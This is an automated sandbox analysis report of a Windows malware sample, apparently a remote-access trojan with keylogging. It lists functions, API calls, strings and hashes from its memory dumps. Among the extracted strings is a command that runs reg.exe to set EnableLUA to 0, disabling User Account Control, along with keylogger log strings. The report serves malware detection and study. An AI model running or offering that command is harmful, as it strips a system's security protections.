Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTimewsprintf
String ID: Offline Keylogger Started$C}w
API String ID: 465354869-1031753189
Opcode ID: a92a7245fc8532d59aa84b5883882662c065ce5b50117d38b88f60bd46131d26
Instruction ID: 95025eaa149aa7af44262cf4db9397527febe2deab88762ca52139077396e222
Opcode Fuzzy Hash: a92a7245fc8532d59aa84b5883882662c065ce5b50117d38b88f60bd46131d26
Instruction Fuzzy Hash: C91194B11003187AD220B7369C86CBF765CDE8139CB40057FF546225D2EA795D54CAFB

Uniqueness

Uniqueness Score: -1.00%

Function 00CC3A44 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 00CC3A94

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-
API String ID: 0-2084034818
Opcode ID: 1d0df2327155258298668801caec56fa60931636a43f378b7c0f2a86dbe86275
Instruction ID: cdda17936324947e2bd70ff6501ccbe15f467590b053c277106c794572e69b87
Opcode Fuzzy Hash: 1d0df2327155258298668801caec56fa60931636a43f378b7c0f2a86dbe86275
Instruction Fuzzy Hash: D511C831A01665FBCB229BE5FC44F1E7758AF05760B158159ECA7A72D0D730EF10A6E0

Uniqueness

Uniqueness Score: -1.00%

Function 0040B0B2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B0C0
wsprintfW.USER32 ref: 0040B141

Part of subcall function 0040A584: SetEvent.KERNEL32(?,?,00000000,0040B158,00000000), ref: 0040A5B0

Strings

[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0040B0C9
], xrefs: 0040B0CE
Offline Keylogger Started, xrefs: 0040B0B9

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: EventLocalTimewsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
API String ID: 1497725170-248792730
Opcode ID: e4fd3f9501e25fe09fb24f2c8d8c06fa50d8110225f551a97fd0a2fd84cf2f10
Instruction ID: 1568c5d8c207f630130e9b3f2560adb69d65205e544b8c09f3532fcdf01993a8
Opcode Fuzzy Hash: e4fd3f9501e25fe09fb24f2c8d8c06fa50d8110225f551a97fd0a2fd84cf2f10
Instruction Fuzzy Hash: 7F118172504118AACB19BB96EC568FE77BCEE48315B00012FF506A20D2FF7C9E45C6AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040A5C3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A69B), ref: 0040A5F9
GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A69B), ref: 0040A608
Sleep.KERNEL32(00002710,?,?,?,0040A69B), ref: 0040A635
CloseHandle.KERNEL32(00000000,?,?,?,0040A69B), ref: 0040A63C

Strings

XQG, xrefs: 0040A5EE

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSizeSleep
String ID: XQG
API String ID: 1958988193-3606453820
Opcode ID: 1520c80fb292d9c5a298b7d16773fabdd74de63c5e2eb41e260ec47767b1fea6
Instruction ID: 3707d938aca408b7ae5a758f45b809843a01d1a20cbb3131bb2780466404e056
Opcode Fuzzy Hash: 1520c80fb292d9c5a298b7d16773fabdd74de63c5e2eb41e260ec47767b1fea6
Instruction Fuzzy Hash: 5A11EB30640740AAE6316B249899B1F3A69EB45316F48093AF1C26A6D2C67A5CA5C72E

Uniqueness

Uniqueness Score: -1.00%

Function 0041D45D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegisterClassExA.USER32(00000030), ref: 0041D4A9
CreateWindowExA.USER32 ref: 0041D4C4
GetLastError.KERNEL32 ref: 0041D4CE

Strings

0, xrefs: 0041D479
MsgWindowClass, xrefs: 0041D474

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: 74b65070635049ec2d26739a327afccf73436923b15f71c562a2fffb27c52056
Instruction ID: a4d69617be618aa425c15b7907214d431a9aa1418f7ef19932ca55fe49f400dc
Opcode Fuzzy Hash: 74b65070635049ec2d26739a327afccf73436923b15f71c562a2fffb27c52056
Instruction Fuzzy Hash: 1701E5B1D0021DBBDB00DFA5ECC49EFBBBCFA05355F40452AF915A6240E77999058BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
CloseHandle.KERNEL32(?), ref: 004077AA
CloseHandle.KERNEL32(?), ref: 004077AF

Strings

C:\Windows\System32\cmd.exe, xrefs: 00407796
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
API String ID: 2922976086-4183131282
Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
Instruction ID: 6d22cccb136f8c7c36af3d9037574c26d6fdc27d3282f638de1bcab3d2eebeae
Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
Instruction Fuzzy Hash: 91F03676D402AD76CB20ABD69C0DEDF7F7CEBC5B11F00056AF904A6141D6745404C6B9

Uniqueness

Uniqueness Score: -1.00%

Function 00407260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON

Download Yara Rule

Strings

SG, xrefs: 004076DA
C:\Users\user\Desktop\yaALNupJCH.exe, xrefs: 004076C4

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID: SG$C:\Users\user\Desktop\yaALNupJCH.exe
API String ID: 0-3011503130
Opcode ID: 609596a1dfd73e3e14ef38a12528c0b0aa9ed42c21a05a81d57c6312ddfedd5a
Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
Opcode Fuzzy Hash: 609596a1dfd73e3e14ef38a12528c0b0aa9ed42c21a05a81d57c6312ddfedd5a
Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E

Uniqueness

Uniqueness Score: -1.00%

Function 00443299 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044324A,?,?,004431EA,?), ref: 004432B9
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004432CC
FreeLibrary.KERNEL32(00000000,?,?,?,0044324A,?,?,004431EA,?), ref: 004432EF

Strings

CorExitProcess, xrefs: 004432C4
mscoree.dll, xrefs: 004432B2

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: f5213dab678aaad7ce64006389dcdf2bf679603fda04a95a9a10c3b8942720a1
Instruction ID: d6523aa37e87c1c2bcc0dcc45afbce366257b9007ee31406ae6b5b7091a20f6c
Opcode Fuzzy Hash: f5213dab678aaad7ce64006389dcdf2bf679603fda04a95a9a10c3b8942720a1
Instruction Fuzzy Hash: FEF06830A10209FBDF119F55DC4ABAEBFB4EF04717F1040A9FC05A2261DB759E44CA98

Uniqueness

Uniqueness Score: -1.00%

Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140

Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457

Strings

KeepAlive | Disabled, xrefs: 004050F9

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: KeepAlive | Disabled
API String ID: 2993684571-305739064
Opcode ID: c89493562ef56592cd274de949ad9ad6ba40f59555c5c3e9409e64ec138271b3
Instruction ID: be8b30cc66014f6f38b18e309eaaceb63009414c245f721ed48000bbed9aec6c
Opcode Fuzzy Hash: c89493562ef56592cd274de949ad9ad6ba40f59555c5c3e9409e64ec138271b3
Instruction Fuzzy Hash: 35F06D71904711BBDB103B758D0AA6B7A98AB02311F0009BEF982916E2D6798840CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00416B7B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0001D3AB,00000000,00000000,00000000), ref: 00416B95
ShowWindow.USER32(00000009), ref: 00416BAF
SetForegroundWindow.USER32 ref: 00416BBB

Part of subcall function 0041CCE9: AllocConsole.KERNEL32(00475338), ref: 0041CCF2
Part of subcall function 0041CCE9: ShowWindow.USER32(00000000,00000000), ref: 0041CD0B
Part of subcall function 0041CCE9: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CD30

Strings

C}w, xrefs: 00416B95
!D@, xrefs: 00416FD7

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
String ID: !D@$C}w
API String ID: 3446828153-1857420697
Opcode ID: 84ef8a25efd007cc1268911e401fe5a5d24e8a31d2882b70fc54203c176493d0
Instruction ID: 6c1e835a2e3b1b3c7886c80a3b5eda03b2495c8f90604007deffab7b6682260a
Opcode Fuzzy Hash: 84ef8a25efd007cc1268911e401fe5a5d24e8a31d2882b70fc54203c176493d0
Instruction Fuzzy Hash: 65F0E2B0148240EED720AB22EC06EFA7758EB50301F00083BFC09C54F2DB389C85C65D

Uniqueness

Uniqueness Score: -1.00%

Function 00CC4AF3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00CC4AE8,?,?,00CC4AB0,?,?,?), ref: 00CC4B08
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CC4B1B
FreeLibrary.KERNEL32(00000000,?,?,00CC4AE8,?,?,00CC4AB0,?,?,?), ref: 00CC4B3E

Strings

CorExitProcess, xrefs: 00CC4B13
mscoree.dll, xrefs: 00CC4B01

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 035d9223254fe41ec9c440c4123476bcd5d8fac94ba2cee0cff3ecf025f29688
Instruction ID: 426fd54d3ad1dbdd7f1014929ad5a0b302cd262f2bdff15235838a320106c2ec
Opcode Fuzzy Hash: 035d9223254fe41ec9c440c4123476bcd5d8fac94ba2cee0cff3ecf025f29688
Instruction Fuzzy Hash: 93F0A030602619FBDB25AB51DD1AFDEBB79EB00756F104066F911A21A0CF74CF00DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0041AD0E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457

GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AD40
PlaySoundW.WINMM(00000000,00000000), ref: 0041AD4E
Sleep.KERNEL32(00002710), ref: 0041AD55
PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AD5E

Strings

Alarm triggered, xrefs: 0041AD17

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: PlaySound$HandleLocalModuleSleepTime
String ID: Alarm triggered
API String ID: 614609389-2816303416
Opcode ID: 4dafe254b891ac29e7b72a4f72621bc5709ac5193998fbb15c850d7c7e1b3c37
Instruction ID: 4347c1bab0e95251c889606097f69e32bbbd9763772de416a0f4cb90da384652
Opcode Fuzzy Hash: 4dafe254b891ac29e7b72a4f72621bc5709ac5193998fbb15c850d7c7e1b3c37
Instruction Fuzzy Hash: 13E01226A44260779610337B6D4FD6F3D28DAC2B5174500BEFA0666192D9580C458AFB

Uniqueness

Uniqueness Score: -1.00%

Function 0041CCA6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CD3B), ref: 0041CCB0
GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CD3B), ref: 0041CCBD
SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CD3B), ref: 0041CCCA
SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CD3B), ref: 0041CCDD

Strings

______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CCD0

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Console$AttributeText$BufferHandleInfoScreen
String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
API String ID: 3024135584-2418719853
Opcode ID: 8ff930b8604bb53ffe35bf108dd56401a2603a1966e7a2aa141ca9340b3fe5c1
Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
Opcode Fuzzy Hash: 8ff930b8604bb53ffe35bf108dd56401a2603a1966e7a2aa141ca9340b3fe5c1
Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5

Uniqueness

Uniqueness Score: -1.00%

Function 00CCFC87 Relevance: 7.9, APIs: 5, Instructions: 374timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00CCFD09
_free.LIBCMT ref: 00CCFD2D
_free.LIBCMT ref: 00CCFEBA
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00CDE710), ref: 00CCFECC
_free.LIBCMT ref: 00CD0087

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: 03f0e36d49ee1babd5fb7ae740cc81eefb9f4b3f3dab0002eb918a82c57252ac
Instruction ID: ef3b27860517d8e5590d88881680a5552ebead9be0de397dd783ee5605814422
Opcode Fuzzy Hash: 03f0e36d49ee1babd5fb7ae740cc81eefb9f4b3f3dab0002eb918a82c57252ac
Instruction Fuzzy Hash: 86C11671900245AFDB219F68C881FAE7BBAEF46314F24057EE5A59B292D7308F43D750

Uniqueness

Uniqueness Score: -1.00%

Function 00CD3A89 Relevance: 7.7, APIs: 5, Instructions: 244COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00CD3D45,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00CD3B2C
__alloca_probe_16.LIBCMT ref: 00CD3BE2
__alloca_probe_16.LIBCMT ref: 00CD3C78
__freea.LIBCMT ref: 00CD3CE3
__freea.LIBCMT ref: 00CD3CEF

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: cd8bf8059d3efcf53800e3e63db12f032a18f5c532246cb5da758b0f47cd14c2
Instruction ID: 76de982beeed2ae9460e2ad174b3520c45739204e051398234e1a144de85d0cf
Opcode Fuzzy Hash: cd8bf8059d3efcf53800e3e63db12f032a18f5c532246cb5da758b0f47cd14c2
Instruction Fuzzy Hash: 85811672A10299ABDF209F54C881EEF7BB5AF49710F18015BEA14B7341D725CF40DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 004412DA Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 142ba21da1110888b7575ac3c17cce9c5c3346c5f5de57ddb1c4218e965c1a6b
Instruction ID: 6773e46793da779a19708a3feb32e25a3a8b71c5f8d5da9fc9af74bf1ccc1eec
Opcode Fuzzy Hash: 142ba21da1110888b7575ac3c17cce9c5c3346c5f5de57ddb1c4218e965c1a6b
Instruction Fuzzy Hash: 0271D431900216EBEB20CF55C844AFFBB74EF85361F54422BE816972A1D7788CC1CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00CD22F4 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00CD2378
__alloca_probe_16.LIBCMT ref: 00CD243E
__freea.LIBCMT ref: 00CD24AA

Part of subcall function 00CC8E3A: HeapAlloc.KERNEL32(00000000,?,?,?,00CCC46B,00000220,?,?,?,?,?,?,00CC596B,?), ref: 00CC8E6C

__freea.LIBCMT ref: 00CD24B3
__freea.LIBCMT ref: 00CD24D6

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 2fa6822132c03e2988a13a0f5c71b9c44ff095cc32d8bee9c51cbd307953e9a1
Instruction ID: 8a14cee48cf2c0debc55a2d8e9f821d7c847a7b156e6bc3177486657c944f374
Opcode Fuzzy Hash: 2fa6822132c03e2988a13a0f5c71b9c44ff095cc32d8bee9c51cbd307953e9a1
Instruction Fuzzy Hash: 6F51E172600216ABDF219F64CC81FBF36A9DF94754F15412AFE18A7350EB38DE5096A0

Uniqueness

Uniqueness Score: -1.00%

Function 00449225 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 0044928F
WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449307
WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449334
_free.LIBCMT ref: 0044927D

Part of subcall function 00446642: RtlFreeHeap.NTDLL(00000000,00000000,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?), ref: 00446658
Part of subcall function 00446642: GetLastError.KERNEL32(?,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?,?), ref: 0044666A

_free.LIBCMT ref: 00449449

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: e861f10619cee8555c14399ef2ad6aeaf2311a34d1c0502880df977b07f1d2e5
Instruction ID: 735babbbd0be657ab0757445e5474bf64f8f3a8b7ca3a8d9b3b34063795322e9
Opcode Fuzzy Hash: e861f10619cee8555c14399ef2ad6aeaf2311a34d1c0502880df977b07f1d2e5
Instruction Fuzzy Hash: 86511D71800205EBEB14EFA5DD819AFB7B8EF45314F1442AFE81493291E7788D41DB5C

Uniqueness

Uniqueness Score: -1.00%

Function 00CC52BE Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00CC51F0), ref: 00CC52E0
GetFileInformationByHandle.KERNEL32(?,?), ref: 00CC533A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00CC51F0,?,000000FF,00000000,00000000), ref: 00CC53C8
__dosmaperr.LIBCMT ref: 00CC53CF
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00CC540C

Part of subcall function 00CC5634: __dosmaperr.LIBCMT ref: 00CC5669

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: fc287ec89f0f8c63f71a592a269031c89f0d0187524db645b284b2a56aa0defb
Instruction ID: 4a6119b25b19cb0be12a717063787b324fdcc154e11b3cc3fc8fa50e17d7c47c
Opcode Fuzzy Hash: fc287ec89f0f8c63f71a592a269031c89f0d0187524db645b284b2a56aa0defb
Instruction Fuzzy Hash: A4414D75900B44ABCB24DFA5DC45EAFBBF9EF88340B14452EF956D3660E730A980DB21

Uniqueness

Uniqueness Score: -1.00%

Function 0040F84B Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON

Download Yara Rule

APIs

Part of subcall function 0041BF05: GetCurrentProcess.KERNEL32(?,?,?,0040D9F8,WinDir,00000000,00000000), ref: 0041BF16

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F869
Process32FirstW.KERNEL32(00000000,?), ref: 0040F88D
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F89C
CloseHandle.KERNEL32(00000000), ref: 0040FA53

Part of subcall function 0041BF33: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F547,00000000,?,?,00475338), ref: 0041BF48

Part of subcall function 0041C12B: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C143
Part of subcall function 0041C12B: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C156

Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FA44

Memory Dump Source

